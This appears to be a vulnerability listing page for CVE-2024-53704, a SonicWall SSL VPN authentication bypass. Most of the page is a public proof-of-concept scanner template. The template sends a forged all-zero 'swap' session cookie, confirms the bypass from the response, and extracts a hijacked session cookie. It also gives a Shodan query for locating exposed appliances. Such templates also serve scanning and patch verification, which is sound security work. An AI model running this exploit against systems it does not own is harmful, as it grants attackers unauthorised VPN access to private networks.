CVE-2024-53704: SSL VPN Session Hijacking

Date: 2025-08-01 | Affected software: SSL VPN | PoC: Public

Vulnerability Description

An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication.

PoC Code [Public]

id: CVE-2024-53704

info:
  name: SSL VPN Session Hijacking
  author: johnk3r
  severity: critical
  description: |
    An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication.
  reference:
    - https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking
    - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-53704
    cwe-id: CWE-287
    epss-score: 0.93819
    epss-percentile: 0.99853
  metadata:
    verified: true
    max-request: 1
    shodan-query: "http.html_hash:-1466805544"
  tags: cve,cve2024,sonicwall,kev,vkev,vuln

http:
  - raw:
      - |
        GET /cgi-bin/sslvpnclient?launchplatform= HTTP/1.1
        Host: {{Hostname}}
        Cookie: swap=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "NELaunchX1"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: header
        regex:
          - 'Set-Cookie: swap=([a-zA-Z0-9]+);'
# digest: 490a00463044022039e6a0c3299479fb51b03981636a78661ba436c78629cf1a3e840e493d07cb9902203becc685afc8673d59218083930afab16e8d0bc2c692ad73383902899b3fc8af:922c64590222798bb761d5b6d8e72950
